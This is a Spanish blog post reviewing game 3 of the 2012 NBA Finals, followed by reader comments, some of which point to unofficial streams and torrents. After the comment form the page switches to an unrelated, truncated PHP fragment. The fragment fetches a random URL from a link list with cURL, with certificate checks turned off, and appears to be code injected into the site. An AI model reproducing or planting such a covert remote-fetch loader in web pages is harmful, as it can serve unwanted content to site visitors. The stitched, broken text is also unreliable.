La Crónica: El grado de la experiencia

18 de June de 2012 por txusma

“We’ve got to understand you don’t get this opportunity very often. Guys may not see this again in life.”
Kedrick Perkins

No lo hubiéramos resumido mejor. Todavía hay quien duda de cuánto peso debe ponderar un título a la hora de valorar la carrera individual de jugadores fundamentales. Soy de los convencidos de que la capacidad de soportar la presión es uno de los aspectos más importantes y no hay examen más exigente que el “ahora o nunca” de una final. Hay poca relación entre un pseudo-amistoso duelo de regular y uno de estos. Lo que sirve para los primeros puede no servir para los segundos.

Anoche los Thunder, por primera vez este año, pecaron de novatos en el primer partido en el American Airlines de Miami. No supieron aprovechar un flojo partido de los Heat, nuevamente atascados en el lanzamiento de media-larga distancia y muy desacertados tanto en la selección de tiro como en la conservación del balón.

Partido igualadísimo y extremadamente emocionante, sí. Pero más por deméritos propios de cada uno que otra cosa. A poco que se ponían los Thunder parecía que se podían ir. Llegaron a estar 10 arriba al final del tercer cuarto. Los problemas (¿evitables?) de faltas de Durant y un carrusel de fallos tontos, pérdidas de balón, fallos en las marcas y desconciertos de diversa índole hacían desaparecer la renta en cuestión de instantes. Los Thunder han sido los mejores lanzadores de tiros libres en la regular. Anoche firmaron un sorprendente 62,5%. Es obvio que echaron de menos esos 9 puntos desperdiciados, por no hablar de cómo te pueden ganar los tableros un equipo con LeBron y Bosh de interiores.

Por cierto, LeBron es el 5º hombre en las últimas 10 campañas que logra como mínimo 29-14 en un partido de la final. Los otros fueron Dirk, Shaq y Duncan en dos ocasiones.

PREMIOS

MVP: 29 puntos (8 en el último cuarto), 14 rebotes y 3 asistencias. Lebron James sigue a un nivel extraterrestre en esta final y en todos los Playoffs. Dwyane Wade, con 25-7-7, cuajó también una actuación mayúscula.

Sorpresa: Un día más hay que destacar las finales que se está marcado Shane Battier. Ayer fueron “sólo” 9 puntos pero sin fallo, metió los 2 triples y los 3 tiros libres que intentó. Tampoco podemos dejar de mencionar los 9 puntos y 2 robos de Derek Fisher. La veteranía es un grado.

Decepción: La tercera pata del “Big Three” de los Thunder, James Harden, vivió una mala noche de cara al aro. Se quedó en 9 puntos tras fallar 8 de sus 10 intentos de canasta.

Esfuerzo en vano: Nuevamente los problemas de faltas lastraron a Kevin Durant. Su último cuarto no fue tan brillante como en partidos anteriores pero aún así acabó con 25 puntos y 6 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Y el Trueno se atascó…
    En el peor partido de lo que llevamos de Finales los Heat impusieron su saber estar y su defensa sobre unos desconcertados Thunder que por primera vez parecieron lo que son, unos recién llegados a estas alturas de la temporada.
    Para empezar, más de lo mismo. Con Perkins sin poder defender el pick&roll una vez más y el Big Three de Miami campando a sus anchas por la zona de OKC los Heat tomaron rápidas ventajas aunque esta vez sin llegar a ser tan grandes como las de los dos partidos anteriores. Los Thunder sobrevivían con un buen Durant y al final del primer cuarto “sólo” perdían de 6 puntos. Se fue igualando la cosa durante un segundo cuarto en el que no se vió nada decisivo, ambos equipos sumaban puntos y fallos y todo quedaba pendiente para el segundo con pequeña ventaja de los Heat.
    En el tercer cuarto los de Brooks por fin cerraron la pintura con una gran defensa de ayudas aprovechando que Chalmers no tenía el día en su lanzamiento exterior y los Heat entraron en crisis ofensiva con ninguno de sus tres espadas atreviéndose a lanzar desde fuera (Incluso salió James Jones para intentar desatascar un poco su ataque). Un gran Durant (23 puntos con 10/14 para entonces) lideraba a los Thunder que corrían y se parecían a ese equipo arrollador que ha llegado a las Finales probablemente por primera vez desde que empezó esta serie. Y aquí llego el primer momento decisivo. En pleno despegue de OKC Durant comete dos faltas casi consecutivas probablemente ambas evitables y se pone en 4 faltas. Inmediatamente se tiene que ir al banco y aunque en la siguiente jugada un 3+1 de Fisher pone en 10 la ventaja de OKC, esa falta de Durantula fue la que dió aire a unos perdidos Heat y metió en dudas a OKC. Sin Durant en cancha LeBron estuvo más libre y los Thunder empezaron a pasar verdaderos aprietos para anotar conducidos por un errático Westbrook de forma que Miami pudo volver a meter el partido en el ritmo de pocos puntos que le interesaba y volver a igualarlo. Quedaba por ver si el último cuarto pertenecía de nuevo a los Thunder como en los 2 primeros partidos…. no fue así.
    Tras varios minutos de imprecisiones por ambos bandos y llegados al final de partido igualado, por una vez los Heat jugaron mucho mejor sus opciones que los Thunder. Con un KD totalmente maniatado por la gran defensa de LeBron y fuera de ritmo por sus faltas, OKC sudaba tinta para sumar sus puntos, sólo anotaron 18 en el último cuarto. Enfrente los Heat no andaban muy sobrados con 10 pérdidas en el último cuarto pero alguna entrada de Wade y los tiros libres forzados por LeBron les sirvieron para abrir la brecha definitiva. Durante estos minutos se echó en falta alguna estrategia de Brooks para liberar a Durant del marcaje de LeBron. Durantula se vió obligado a jugar cada balón al poste contra James en vez de buscarle bloqueos para poder liberarle o darle ventaja.
    Por los Heat, muy buen partido de LeBron imparable en el campo abierto y metiéndo en faltas a Durant ayudado de Wade (aunque con malos porcentajes), de Bosh bajo los aros y de Battier con algún triple importante en el segundo tiempo. En OKC un problema importantísimo, Harden no está en esta final, horrible partido del barbas (2/10 para 9 puntitos) y ya sabemos que es un jugador decisivo para su equipo. Westbrook alocado y fallón así que Durant se quedó muy sólo en ataque esta vez. Incomprensible para mí que Perkins juegue más minutos que Ibaka ya que de su defensa del pick&roll los Heat están sacando ventajas constantes (y eso que este fue su mejor partido de la final). Parece mentira que los Heat estén ganando la batalla bajo los aros en estas series.
    Ahora queda la sensación de que la final se juega a ritmo de los Heat. Los Thunder están contra la pared y tendrán que reaccionar en el próximo partido. Para llevar la final a su terreno necesitarán que Westbrook se controle, que Harden vuelva a ser el del resto de la temporada, que todos vayan al rebote y que Brooks se de cuenta del agujero que les crea tener tantos minutos 2 pivots cuando uno de ellos es Perkins. Es el momento de ver si los Thunder son de verdad ese equipo maduro que puede ser campeón o si las Finales les están viniendo grandes para su juventud. Ahora los Heat envalentonados lo tienen todo de cara para intentar dar el golpe casi definitivo en el 4º. Queda mucha final pero los Thunder deben reaccionar ya si quieren el anillo

      Citar

  2. txusma dice:
    #2

    Me siento aludido! 😀

    Realmente para valorar un anillo deberíamos conocer como se desarrollaron sus Playoffs y sus Finales, si no es muy difícil. Por ejemplo, Shane Battier se está ganando el anillo a pulso y seguro que de aquí a 20 años alguien dirá que Battier tiene un anillo regalado si es que los Heat acaban ganando. Pero, siguiendo con la idea d que los Heat ganan, Battier no ganaría jamás un anillo sinó se juntara con un auténtico jugador franquicia y es ahí donde la valoración ha de ser un poco diferente. No puedo valorar los anillos que ganen Lebron y Battier juntos, lo siento.

    E histórico Lebron, una vez más, pero estamos tan acostumbrados que a la gente le gustarán más los puntos de Durant

      Citar

  3. GreenPride dice:
    #3

    Creo que a vueltas con la importancia de LeBron, sí que va camino de ser un jugador histórico ya que está liderando a los Heat de manera clarísima hacia el título con actuaciones sobrehumanas. En este partido sin ir más lejos es el principal responsable de la victoria, más que por sus puntos por meter en faltas a Durant y luego forzarle a lanzar malos tiros durante las últimas posesiones y también por coger nada menos que 14 rebotes ayudando a que lo que parecía una clara ventaja Thunder se convierta en 7 rebotes de más para los Heat con lo importante que puede llegar a ser esto.
    Si los Heat ganan este título será el espaldarazo definitivo a su carrera y podremos empezar a hablar de él al nivel de los más grandes sobre todo si mete algún tiro definitivo en las Finales que es lo único que le queda por hacer en estos PO.
    Si no gana ningún título, pasará a la historia probablemente como el principal jugador sin títulos.
    Quedan muchas Finales, no nos volvamos locos, recordemos la reacción de OKC cuando estuvo contra la pared contra San Antonio. El 4º va a ser el primer partido realmente a muerte de estas finales y quién salga con la victoria debajo del brazo puede tener mucho ganado, cosa que está clara en el caso de Miami pero probablemente sea igual para OKC.
    P.D. Está claro que no es lo mismo ganar un anillo siendo un secundario que llevando el peso del equipo, vamos que los 4 de Duncan valen 30 veces más que los 7 de Horry por poner un ejemplo. Podríamos decir que no se puede medir a los grandes por número de anillos, pero para ser un grande entre los grandes hay que ganar títulos que esto es deporte y se mide principalmente así

      Citar

  4. Esteban dice:
    #4

    bueno, desp de pàrtidos asi y de estos PO no me molestaria que lebron gane su anillo, realmente es uno de los jugadores que mas lo merecen

      Citar

  5. Esteban dice:
    #5

    mientras durant siga metiendose en lio de faltas, y lebron defendiendolo asi, dificil la historia para el thunder

      Citar

  6. Sancho88 dice:
    #6

    otro día que no va lo de rojadirecta, qué mierdas son colgando los partidos. No sé si dio ayer el partido cuatro, si lo van a repetir en energy… ni idea. alguien sabe cómo verlo? Reconozco mi grado de mariconez, ya que llevo casi dos meses sin trasnochar.

      Citar

  7. Ru dice:
    #7

    Esteban:
    mientras durant siga metiendose en lio de faltas, y lebron defendiendolo asi, dificil la historia para el thunder

    +1

    Es uno de los aspectos donde más se nota eso que comentáis de la experiencia,en ciertos momentos le pueden las ganas a Durant,y eso que lo considero un jugador inteligentísimo,pero ya van dos partidos con problemas de faltas y Miami hace sangre por esa vía porque Harden está decepcionando.Las opciones de OKC pasan principalmente por sus manos,necesitan que aparezca.

    Lo de Battier a mí me tiene impresionado,vaya muñequita más afinada con los años el ex de Memphis.En cierto punto me quita el mal sabor de boca que me deja Mike “El Penas” Miller.

      Citar

  8. Ru dice:
    #8

    Sancho88:
    otro día que no va lo de rojadirecta, qué mierdas son colgando los partidos. No sé si dio ayer el partido cuatro, si lo van a repetir en energy… ni idea. alguien sabe cómo verlo? Reconozco mi grado de mariconez, ya que llevo casi dos meses sin trasnochar.

    Sanchoooo! yo me veo los partidos al día siguiente y en HD,los disfruto mucho más así que pixelados,por muy poco que sean.No sé si se puede poner aquí pero en esa misma página que comentas,en su foro,sección descarga de partidos tienes mogollón de enlaces.Yo tiro de torrents que para mi gusto va de lujo pero será por opciones…si tienes más dudas pregunta.

      Citar

  9. Sancho88 dice:
    #9

    Es lo que hago yo Ru, pero los de ayer no va ninguno, y lo de Torrent me lo descargué porque decían en el foro que era lo mejor, pero empezaron a instalarse accesorios en el mozilla que me paraban el ordenador… lo tuve que borrar todo.

      Citar

  10. KB # 24 dice:
    #10

    Si os queréis reir un rato mirad a este pollo! Un tal Guillermo, un cómico medio mexicano medio estadounidense, que no sabe pronunciar Dwayne Wade

      Citar

  11. Ru dice:
    #11

    xDDD muy bueno KB!

    Sancho88:
    Es lo que hago yo Ru, pero los de ayer no va ninguno, y lo de Torrent me lo descargué porque decían en el foro que era lo mejor, pero empezaron a instalarse accesorios en el mozilla que me paraban el ordenador… lo tuve que borrar todo.

    Pero qué es lo que te instala complementos en firefox,¿los enlaces o el programa?yo tengo el Bitorrent,que en la propia página buscando el programa te lo bajas.Nunca me dio problemas y uso firefox,no sé…

      Citar

  12. simon dice:
    #12

    KB # 24:
    Si os queréis reir un rato mirad a este pollo! Un tal Guillermo, un cómico medio mexicano medio estadounidense, que no sabe pronunciar Dwayne Wade

    http://www.youtube.com/watch?feature=player_embedded&v=8OeIVgokCDo

    que pijote de reir! el tio no se entera.

      Citar

  13. Lucho dice:
    #13

    Sancho, para verlo en vivo proba en deportesonline.com

      Citar

  14. HisRoyalAirness dice:
    #14

    Sancho si mañana a la hora del partido estás por aquí te cuelgo un enlace.

    Por cierto, la cuarta falta que le pitan a Durant es un atraco a mano armada. La NBA quiere 7 partidos, mucha pasta en publicidad

      Citar

  15. GreenPride dice:
    #15

    Cierto que la 4ª de Durant es bastante rigurosa pero también es cierto que él está cometiendo errores y haciendo faltas tontas que le están costando mucho a su equipo.
    Además creo que Brooks se equivoca al ponerle desde el inicio sobre LeBron ya que LeBron ataca y ataca y Durant cada vez tiene más dudas al defenderle para no cometer faltas. Creo que debería empezar ya con Sefolosha sobre él y si en el tercer cuarto ve que está poco cargado poner un rato a Durant para que descanse Tabo.
    Veremos que ajuster propone el bueno de Scott para el 4º partido y si Harden empieza a jugar estas Finales que sólo le hemos visto en el primer tiempo del segundo partido. Los Thunder necesitan más producción de él y menos tiros de Westbrook para carburar mejor en ataque.

      Citar

  16. GreenPride dice:
    #16

    Y las Finales se nos acaban… este 4º partido era decisivo y así lo entendieron los Thunder que salieron a muerte y llegaron a tener 17 arriba. Luego reacción de los Heat con los secundarios y final igualado gracias al partidazo de Westbrook. Y al final de nuevo el clutch perteneció a Miami. 3-1 y sensación de que esto acaba en el 5º (siempre que la lesión de James no sea nada). Luego más en su post

      Citar

  17. melo15 dice:
    #17

    Alguien lo vio por Canal+, quien me acompaña a matar al comentarista que no es Daimiel.
    Vaya IMBECIL!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>